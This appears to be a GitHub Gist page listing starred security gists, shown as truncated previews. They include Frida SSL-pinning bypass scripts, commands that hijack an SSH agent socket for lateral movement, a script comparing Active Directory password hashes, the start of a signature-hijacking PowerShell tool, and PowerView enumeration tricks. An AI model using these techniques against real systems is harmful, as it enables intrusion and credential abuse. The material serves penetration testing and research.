Skip to content

Instantly share code, notes, and snippets.

View interference-security's full-sized avatar

Abhineet Jayaraj interference-security

259 followers · 10 following
View GitHub Profile
@incogbyte
incogbyte / mixunpin.js
Last active April 21, 2025 03:21
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@leonjza
leonjza / DOCKER-IN-AN-HOUR.md
Last active February 19, 2025 15:58
Docker in an hour Workshop

docker-in-an-hour

@leonjza

Welcome to docker-in-an-hour! This is a "JIT" for docker, with many explanations being just enough to defend yourself. It is highly recommended that you go and at least Google some of the stuff here after doing the workshop. Read the official docs with real explanations.

toc

@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active March 21, 2025 18:36
Subdomain Wordlist
@tomnomnom
tomnomnom / google-copy.js
Created June 19, 2019 21:27
Bookmarklet to copy URLs from a Google search results page
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b)
@cubehouse
cubehouse / pinning.js
Last active February 23, 2025 17:15
A Frida script to bypass SSL Pinning on Android. https://blog.jamie.holdings/2019/01/19/advanced-certificate-bypassing-in-android-with-frida/
// start with:
// frida -U -l pinning.js -f [APP_ID] --no-pause
Java.perform(function () {
console.log('')
console.log('===')
console.log('* Injecting hooks into common certificate pinning methods *')
console.log('===')
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
@rustymagnet3000
rustymagnet3000 / ios_introspection.md
Last active April 4, 2025 02:43
Static and Dynamic iOS inspection
@bandrel
bandrel / check_hashes.py
Last active November 5, 2024 06:12
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#!/usr/bin/env python3
#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>
import argparse
import re
parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")
@netbiosX
netbiosX / DigitalSignature-Hijack.ps1
Last active January 27, 2025 11:03
Hijack Digital Signatures and Bypass Authenticode Hash Validation
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active March 30, 2025 05:58
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server